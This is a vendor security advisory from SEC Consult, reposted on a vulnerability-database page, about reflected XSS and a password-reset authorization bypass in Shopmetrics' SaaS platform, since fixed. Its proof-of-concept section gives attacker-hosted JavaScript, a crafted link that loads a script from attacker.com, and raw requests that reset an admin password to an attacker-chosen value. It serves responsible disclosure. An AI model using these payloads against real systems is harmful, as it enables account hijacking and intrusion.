Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormA. Vodyasov, D. Zalmanov, sec-consult.comPACKETSTORM:165877
HistoryFeb 04, 2022 - 12:00 a.m.

Shopmetrics Mystery Shopping Software Broken Access Control / XSS

2022-02-0400:00:00
A. Vodyasov, D. Zalmanov, sec-consult.com
packetstormsecurity.com
205
JSON
`SEC Consult Vulnerability Lab Security Advisory < 20220202-0 >  
=======================================================================  
title: Broken access control & Cross-Site Scripting  
product: Shopmetrics Mystery Shopping Software  
vulnerable version: SaaS platform before v21-11  
fixed version: SaaS platform v21-11  
CVE number: n/a for SaaS  
impact: Critical  
homepage: https://www.shopmetrics.com/  
found: 2021-05-06  
by: D. Zalmanov (Office Moscow)  
A. Vodyasov (Office Moscow)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Atos company  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Founded in 2004, Shopmetrics is a company that offers technology platform  
solutions to mystery shopping and market research providers worldwide. Today  
Shopmetrics is a global organization with offices in North America and Europe.  
With over 80 full-time, dedicated developers and product specialists we are  
committed to providing technology that is the industry benchmark in mystery  
shopping and market research."  
  
Source: https://shopmetrics.com/Company.asp  
  
  
Business recommendation:  
------------------------  
The solution is provided as software as a service. The current version as of v21-11  
already contains the fix and all users should be protected.  
  
An in-depth security analysis performed by security professionals is highly  
advised, as the software may be affected from further security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Reflected cross site scripting  
A reflected cross site scripting vulnerability was identified on  
various input fields in the application. An attacker is able to perform actions  
in the context of the attacked user by exploiting this vulnerability.  
  
  
2) Broken Access Control  
Users of the web application are required to supply a username and password  
combination in order to login. This identification mechanism is used in order  
to ensure that only those who possess the proper credentials are able to login  
to the application, while unauthorized users cannot.  
  
A user who has forgotten or misplaced their password is able to request that  
their password be reset by supplying a valid email address.  
  
Therefore, it is of the utmost importance to ensure that unauthorized users –  
whether accidentally or intentionally – will not be able to step outside the scope  
of their permission boundaries. This means, inter alia, that the tier’s logic may  
not be manipulated by the client-side input and that the logic is confined to  
parameters defined solely by the server.  
  
It was identified that due to flaws in the authorization scheme, an authorization  
bypass vulnerability allows an attacker to get access to the restricted  
password reset functionality, which allows an attacker with knowledge of a valid  
email address, to reset any password and hijack a user account.  
  
  
Proof of concept:  
-----------------  
1) Reflected cross site scripting  
The request to create a new user looks like the following:  
  
-------------------------------------------------------------------------------  
POST /document.asp?alias=mystadministration.user.manage HTTP/2  
[...]  
  
CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&  
firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&city=xyz&  
state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&phonework=2132132121321&  
phonemobile=32132121321&fax=213321321321&email=user%40victim.com&timezone=27&defaultWelcomePage=&isdisabled=N  
-------------------------------------------------------------------------------  
  
In a live attack scenario the following JavaScript code will be hosted on the  
attacker's server.  
  
-------------------------------------------------------------------------------  
var data="CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&  
firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&  
city=xyz&state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&  
phonework=2132132121321&phonemobile=32132121321&fax=213321321321&email=user%40victim.com&  
timezone=27&defaultWelcomePage=&isdisabled=N";  
var url="https://shopmetricshost/document.asp?alias=mystadministration.user.manage";  
var http=new XMLHttpRequest();  
  
http.open('POST', url, true);  
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');  
http.send(data)  
-------------------------------------------------------------------------------  
  
When the logged-in victim clicks on the following link, the script will be executed  
in the context of the browser and the new user will be created.  
  
-------------------------------------------------------------------------------  
https://shopmetricshost/open/data.asp?post={%22action%22:%22exec%22,%22dataset%22:  
{%22datasetname%22:%22/System/Platform/Globalization/LiteralsGetTranslations%22,%22dataformat%22:%22simple%22,%22datafieldproperties%22:{%22columns%22:[%22name%22]}},  
%22parameters%22:[{%22name%22:%22LiteralIDs%22,  
%22value%22:%22XXX%3C%3E%3Chtml%3E%3Cscript+src%3dhttps%3a//attacker.com%3a4443/payload.js%3E%3C/script%3E%3C/html%3EYYY%22}]}  
-------------------------------------------------------------------------------  
  
  
2) Broken Access Control  
There is a password reset functionality in the application. The following request is  
sent when the user tries to reset the password.  
  
-------------------------------------------------------------------------------  
POST /open/data.asp HTTP/2  
[...]  
  
post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",  
"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},  
"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},  
{"name"%3a"EntityName","value"%3a"ChangePassword"},{"name"%3a"EntityInstanceID","value"%3anull},  
{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a¬- ¬P¬¬34|  
BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬user%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬-   
F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬newpass¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬¬newpass¬U¬5983¬-   
z¬B¬0-1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}  
-------------------------------------------------------------------------------  
  
There is no integrity check of the parameters of this request. Therefore, an attacker  
can supply any email to this request and the password of the account, which is connected  
to the supplied e-mail, will be changed to the password value controlled by an attacker. For example,  
the request to change the password of the admin user with e-mail [email protected] (Administrator user).  
  
-------------------------------------------------------------------------------  
POST /open/data.asp HTTP/2  
[...]  
  
post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",  
"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},{"name"%3a"EntityName","value"%3a"ChangePassword"},  
{"name"%3a"EntityInstanceID","value"%3anull},{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a15¬¬0¬-   
¬ab¬-Mozilla/5.0+(Windows+NT+10.0%3b+Win64%3b+x64%3b+rv%3a88.0)+Gecko/20100101+Firefox/88.0¬¬1¬- ¬P¬¬34|  
BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬admin%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬-   
F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬AttackerPassword¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬-AttackerPassword¬U¬5983¬-   
z¬B¬0¬1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},  
{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}  
-------------------------------------------------------------------------------  
  
After this request an attacker can successfully login as admin user with the  
password "AttackerPassword".  
  
  
Vulnerable / tested versions:  
-----------------------------  
No version number is available as the solution is provided as software as a service (SaaS).  
The product was affected by the vulnerability during the timeframe of the test and until  
it was fixed later in 2021.  
  
  
Vendor contact timeline:  
------------------------  
The vendor was contacted through a third party. The vendor confirmed on 7th  
December 2021 that the advisory could be published.  
  
  
Solution:  
---------  
The solution is provided as software as a service. The current version as of v21-11  
contains the fix and all users should be protected.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult, an Atos company  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF D. Zalmanov, A. Vodyasov / @2022  
  
  
`
JSON